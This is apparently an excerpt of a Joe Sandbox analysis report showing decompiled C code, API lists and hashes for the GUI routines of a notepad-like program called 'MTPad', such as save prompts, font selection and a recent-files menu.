                                                                                                                                                                                                                                                                                          0x00810332
                                                                                                                                                                                                                                                                                          0x00810338
                                                                                                                                                                                                                                                                                          0x0081034b
                                                                                                                                                                                                                                                                                          0x00810374
                                                                                                                                                                                                                                                                                          0x00810379
                                                                                                                                                                                                                                                                                          0x0081037f
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x00810385
                                                                                                                                                                                                                                                                                          0x0081038f
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x008103b4
                                                                                                                                                                                                                                                                                          0x008103ba
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810247
                                                                                                                                                                                                                                                                                          0x0081024f
                                                                                                                                                                                                                                                                                          0x00810260
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810283
                                                                                                                                                                                                                                                                                          0x0081028d
                                                                                                                                                                                                                                                                                          0x00810293
                                                                                                                                                                                                                                                                                          0x0081029d
                                                                                                                                                                                                                                                                                          0x008102b7
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008101e2
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x008101d7
                                                                                                                                                                                                                                                                                          0x008103c0
                                                                                                                                                                                                                                                                                          0x008103c1
                                                                                                                                                                                                                                                                                          0x008103c7
                                                                                                                                                                                                                                                                                          0x008103d3
                                                                                                                                                                                                                                                                                          0x008103e2
                                                                                                                                                                                                                                                                                          0x00810413
                                                                                                                                                                                                                                                                                          0x00810414
                                                                                                                                                                                                                                                                                          0x00810416
                                                                                                                                                                                                                                                                                          0x0081041b
                                                                                                                                                                                                                                                                                          0x00810424
                                                                                                                                                                                                                                                                                          0x008103e4
                                                                                                                                                                                                                                                                                          0x008103e6
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103f1
                                                                                                                                                                                                                                                                                          0x008103f9
                                                                                                                                                                                                                                                                                          0x008103fa
                                                                                                                                                                                                                                                                                          0x008103fb
                                                                                                                                                                                                                                                                                          0x00810409
                                                                                                                                                                                                                                                                                          0x00810409

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$ItemMessage$AppendCountSend_memset$BeepDestroyInfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2301784159-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f6a6301fd8c3eb397ecef9129513420b515eb37fa384b2f4a62edc5a474d12fc
                                                                                                                                                                                                                                                                                          • Instruction ID: 269e39dc9aabfc3611c634435df18d7b205bd1601debabf2e0dc6fd63166b1c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a6301fd8c3eb397ecef9129513420b515eb37fa384b2f4a62edc5a474d12fc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78213970E012699FDB60CB64CD45BDEB7B8FF09300F0081DAAA49E6241D6705AC18F60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E00810A20(int _a4, int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				short _v11;
                                                                                                                                                                                                                                                                                          				short _v15;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                                                                                          				struct HHOOK__* _t39;
                                                                                                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t19 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t19 ^ _t46;
                                                                                                                                                                                                                                                                                          				_t43 = _a4;
                                                                                                                                                                                                                                                                                          				_t42 = _a8;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v15 = 0;
                                                                                                                                                                                                                                                                                          				_v11 = 0;
                                                                                                                                                                                                                                                                                          				if(_t43 != 3) {
                                                                                                                                                                                                                                                                                          					if(_t43 == 4) {
                                                                                                                                                                                                                                                                                          						GetClassNameA(_t42,  &_v16, 7);
                                                                                                                                                                                                                                                                                          						if(lstrcmpA("#32768",  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          							_t41 =  *0x88199c; // 0x0
                                                                                                                                                                                                                                                                                          							_t37 =  *((intOrPtr*)(_t41 + 8));
                                                                                                                                                                                                                                                                                          							_t27 = _t37 - 1;
                                                                                                                                                                                                                                                                                          							if(_t27 >= 0 && _t27 < _t37) {
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t41 + 8)) = _t27;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					GetClassNameA(_t42,  &_v16, 7);
                                                                                                                                                                                                                                                                                          					if(lstrcmpA("#32768",  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          						_t44 =  *0x88199c; // 0x0
                                                                                                                                                                                                                                                                                          						_v20 = _t42;
                                                                                                                                                                                                                                                                                          						E00811C50( &_v20, _t44 + 4);
                                                                                                                                                                                                                                                                                          						_t43 = _a4;
                                                                                                                                                                                                                                                                                          						_t32 = _t32;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t39 =  *0x881998; // 0x0
                                                                                                                                                                                                                                                                                          				return E008159E6(CallNextHookEx(_t39, _t43, _t42, _a12), _t32, _v8 ^ _t46, _t39, _t42, _t43);
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00810a26
                                                                                                                                                                                                                                                                                          0x00810a2d
                                                                                                                                                                                                                                                                                          0x00810a31
                                                                                                                                                                                                                                                                                          0x00810a37
                                                                                                                                                                                                                                                                                          0x00810a3a
                                                                                                                                                                                                                                                                                          0x00810a3e
                                                                                                                                                                                                                                                                                          0x00810a41
                                                                                                                                                                                                                                                                                          0x00810a48
                                                                                                                                                                                                                                                                                          0x00810a88
                                                                                                                                                                                                                                                                                          0x00810a91
                                                                                                                                                                                                                                                                                          0x00810aa8
                                                                                                                                                                                                                                                                                          0x00810aaa
                                                                                                                                                                                                                                                                                          0x00810ab0
                                                                                                                                                                                                                                                                                          0x00810ab3
                                                                                                                                                                                                                                                                                          0x00810ab8
                                                                                                                                                                                                                                                                                          0x00810abe
                                                                                                                                                                                                                                                                                          0x00810abe
                                                                                                                                                                                                                                                                                          0x00810ab8
                                                                                                                                                                                                                                                                                          0x00810aa8
                                                                                                                                                                                                                                                                                          0x00810a4a
                                                                                                                                                                                                                                                                                          0x00810a51
                                                                                                                                                                                                                                                                                          0x00810a68
                                                                                                                                                                                                                                                                                          0x00810a6a
                                                                                                                                                                                                                                                                                          0x00810a77
                                                                                                                                                                                                                                                                                          0x00810a7a
                                                                                                                                                                                                                                                                                          0x00810a7f
                                                                                                                                                                                                                                                                                          0x00810a82
                                                                                                                                                                                                                                                                                          0x00810a82
                                                                                                                                                                                                                                                                                          0x00810a68
                                                                                                                                                                                                                                                                                          0x00810ac4
                                                                                                                                                                                                                                                                                          0x00810ae3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,00000000,00000007), ref: 00810A51
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(#32768,00000000), ref: 00810A60
                                                                                                                                                                                                                                                                                            • Part of subcall function 00811C50: __recalloc.LIBCMT ref: 00811C8E
                                                                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,00000000,00000007), ref: 00810A91
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(#32768,00000000), ref: 00810AA0
                                                                                                                                                                                                                                                                                          • CallNextHookEx.USER32 ref: 00810ACE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ClassNamelstrcmp$CallHookNext__recalloc
                                                                                                                                                                                                                                                                                          • String ID: #32768
                                                                                                                                                                                                                                                                                          • API String ID: 480024222-207879865
                                                                                                                                                                                                                                                                                          • Opcode ID: b234ec0b4871fabbc5b68238b8ce845a46814a40bd6aa8aee56e8f0d45104059
                                                                                                                                                                                                                                                                                          • Instruction ID: e08a3bb09251401d9a7783e36ecf2a166c353530e5c7a631710104a7a6b81987
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b234ec0b4871fabbc5b68238b8ce845a46814a40bd6aa8aee56e8f0d45104059
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F215C35A41219EFDB10DF64DC889EEBB7CFF45710B01855AE815D7240D7B0AA81CB92
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E008072C0(void* __ebx, void* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v308;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                                                                                          				int _t18;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                                                                                                          				_t9 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                                                                          				_t31 = __ecx;
                                                                                                                                                                                                                                                                                          				if(SendMessageA( *(__ecx + 4), 0xb8, 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					__eflags = _v8 ^ _t33;
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t22, _v8 ^ _t33, _t30, _t31, _t32);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t15 = GetParent( *(_t31 + 4));
                                                                                                                                                                                                                                                                                          					_t30 = _t31 + 0x15c;
                                                                                                                                                                                                                                                                                          					_t32 = _t15;
                                                                                                                                                                                                                                                                                          					wsprintfA( &_v308, "Save changes to %s ?", _t31 + 0x15c);
                                                                                                                                                                                                                                                                                          					_t18 = MessageBoxA(_t15,  &_v308, "MTPad", 0x33);
                                                                                                                                                                                                                                                                                          					if(_t18 != 2) {
                                                                                                                                                                                                                                                                                          						__eflags = _t18 - 6;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t19 = E00807370(_t31, __eflags);
                                                                                                                                                                                                                                                                                          							__eflags = _t19;
                                                                                                                                                                                                                                                                                          							if(_t19 == 0) {
                                                                                                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                                                                                                          						return E008159E6(0, _t22, _v8 ^ _t33, _t30, _t31, _t32);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x008072c0
                                                                                                                                                                                                                                                                                          0x008072c9
                                                                                                                                                                                                                                                                                          0x008072d0
                                                                                                                                                                                                                                                                                          0x008072d9
                                                                                                                                                                                                                                                                                          0x008072ec
                                                                                                                                                                                                                                                                                          0x00807350
                                                                                                                                                                                                                                                                                          0x00807354
                                                                                                                                                                                                                                                                                          0x00807364
                                                                                                                                                                                                                                                                                          0x008072ee
                                                                                                                                                                                                                                                                                          0x008072f2
                                                                                                                                                                                                                                                                                          0x008072f8
                                                                                                                                                                                                                                                                                          0x008072ff
                                                                                                                                                                                                                                                                                          0x0080730d
                                                                                                                                                                                                                                                                                          0x00807325
                                                                                                                                                                                                                                                                                          0x0080732e
                                                                                                                                                                                                                                                                                          0x00807342
                                                                                                                                                                                                                                                                                          0x00807345
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00807347
                                                                                                                                                                                                                                                                                          0x00807347
                                                                                                                                                                                                                                                                                          0x0080734c
                                                                                                                                                                                                                                                                                          0x0080734e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080734e
                                                                                                                                                                                                                                                                                          0x00807330
                                                                                                                                                                                                                                                                                          0x00807330
                                                                                                                                                                                                                                                                                          0x00807341
                                                                                                                                                                                                                                                                                          0x00807341
                                                                                                                                                                                                                                                                                          0x0080732e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$ParentSendwsprintf
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Save changes to %s ?
                                                                                                                                                                                                                                                                                          • API String ID: 1966038634-1718077980
                                                                                                                                                                                                                                                                                          • Opcode ID: a136a4ecba3e4a92bfcfbdd6b8252dffa1b307bcb6241cba6827d7769e8733c3
                                                                                                                                                                                                                                                                                          • Instruction ID: 27120ac9227ffb01bba773e53521a6568a73ed726fc1d54028d3976eb6d8a29a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a136a4ecba3e4a92bfcfbdd6b8252dffa1b307bcb6241cba6827d7769e8733c3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B211C831B04204ABD724EB69ED5AFAA77A8FF48710F404159F909D73C0EA70AA55CBD1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                                                                                          			E00807040(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v68;
                                                                                                                                                                                                                                                                                          				signed int _v172;
                                                                                                                                                                                                                                                                                          				intOrPtr _v208;
                                                                                                                                                                                                                                                                                          				char _v228;
                                                                                                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t37 = __edi;
                                                                                                                                                                                                                                                                                          				_t30 = __ebx;
                                                                                                                                                                                                                                                                                          				_t15 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t15 ^ _t41;
                                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                                          				_t39 =  &_v228;
                                                                                                                                                                                                                                                                                          				E0080AE50( &_v228);
                                                                                                                                                                                                                                                                                          				_v228 = 0x822d68;
                                                                                                                                                                                                                                                                                          				GetObjectA( *(__edi + 0x4c), 0x3c,  &_v68);
                                                                                                                                                                                                                                                                                          				_v172 = _v172 | 0x00000040;
                                                                                                                                                                                                                                                                                          				_t21 = E0080AEC0(GetActiveWindow(), _t39, __edi, _t39);
                                                                                                                                                                                                                                                                                          				_pop(_t40);
                                                                                                                                                                                                                                                                                          				if(_t21 == 1) {
                                                                                                                                                                                                                                                                                          					if(DeleteObject( *(__edi + 0x4c)) != 0) {
                                                                                                                                                                                                                                                                                          						 *(__edi + 0x4c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t28 = CreateFontIndirectA( &_v68);
                                                                                                                                                                                                                                                                                          					 *(_t37 + 0x4c) = _t28;
                                                                                                                                                                                                                                                                                          					_t35 =  *(_t37 + 4);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t37 + 4), 0x30, _t28, 1);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t22 = _v208;
                                                                                                                                                                                                                                                                                          				if(_v208 != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t22);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E008159E6(0, _t30, _v8 ^ _t41, _t35, _t37, _t40);
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x00807040
                                                                                                                                                                                                                                                                                          0x00807040
                                                                                                                                                                                                                                                                                          0x00807049
                                                                                                                                                                                                                                                                                          0x00807050
                                                                                                                                                                                                                                                                                          0x00807053
                                                                                                                                                                                                                                                                                          0x00807054
                                                                                                                                                                                                                                                                                          0x0080705a
                                                                                                                                                                                                                                                                                          0x00807069
                                                                                                                                                                                                                                                                                          0x00807073
                                                                                                                                                                                                                                                                                          0x00807079
                                                                                                                                                                                                                                                                                          0x00807088
                                                                                                                                                                                                                                                                                          0x0080708d
                                                                                                                                                                                                                                                                                          0x00807091
                                                                                                                                                                                                                                                                                          0x0080709f
                                                                                                                                                                                                                                                                                          0x008070a1
                                                                                                                                                                                                                                                                                          0x008070a1
                                                                                                                                                                                                                                                                                          0x008070ac
                                                                                                                                                                                                                                                                                          0x008070b5
                                                                                                                                                                                                                                                                                          0x008070b8
                                                                                                                                                                                                                                                                                          0x008070be
                                                                                                                                                                                                                                                                                          0x008070be
                                                                                                                                                                                                                                                                                          0x008070c4
                                                                                                                                                                                                                                                                                          0x008070cc
                                                                                                                                                                                                                                                                                          0x008070cf
                                                                                                                                                                                                                                                                                          0x008070cf
                                                                                                                                                                                                                                                                                          0x008070e3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AE50: _memset.LIBCMT ref: 0080AE70
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AE50: _memset.LIBCMT ref: 0080AE80
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AE50: _memset.LIBCMT ref: 0080AE8D
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 00807073
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 00807080
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AEC0: GetCurrentThreadId.KERNEL32 ref: 0080AED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AEC0: EnterCriticalSection.KERNEL32(00880C68), ref: 0080AEE4
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AEC0: LeaveCriticalSection.KERNEL32(00880C68), ref: 0080AEFE
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AEC0: ChooseFontA.COMDLG32(?), ref: 0080AF08
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080AEC0: _memmove.LIBCMT ref: 0080AF28
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00807097
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 008070AC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 008070BE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _memset$CriticalFontObjectSection$ActiveChooseCreateCurrentDeleteEnterIndirectLeaveMessageSendThreadWindow_memmove
                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                          • API String ID: 490426879-2766056989
                                                                                                                                                                                                                                                                                          • Opcode ID: 36d7f5568b11105290cc9870da2c4b4cbd09b945e6f4dd6ade454cc5c0ec25ba
                                                                                                                                                                                                                                                                                          • Instruction ID: 991de8adf08c568fc2c4c2a505cd62135ca9de962530425e85dc85e512727b4e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36d7f5568b11105290cc9870da2c4b4cbd09b945e6f4dd6ade454cc5c0ec25ba
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8112E70A14618EBDB20DBA5DC49B6EB7BCFF44740F008558F905E7281DB71A945CF92
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0080B100(struct HMENU__* __eax, void* __ecx) {
                                                                                                                                                                                                                                                                                          				CHAR* _t14;
                                                                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t4 = __eax;
                                                                                                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_t14 = _t17 + 0x14;
                                                                                                                                                                                                                                                                                          					if(_t14 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						return _t4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrlenA("(empty)") <= 0x103) {
                                                                                                                                                                                                                                                                                          						_t4 = lstrcpynA(_t14, "(empty)", lstrlenA("(empty)") + 1);
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return lstrcpynA(_t14, "(empty)", 0x104);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t4 = GetMenuStringA(__eax, 0xe110, __ecx + 0x14, 0x104, 0);
                                                                                                                                                                                                                                                                                          					if(_t4 != 0) {
                                                                                                                                                                                                                                                                                          						return _t4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x0080b100
                                                                                                                                                                                                                                                                                          0x0080b101
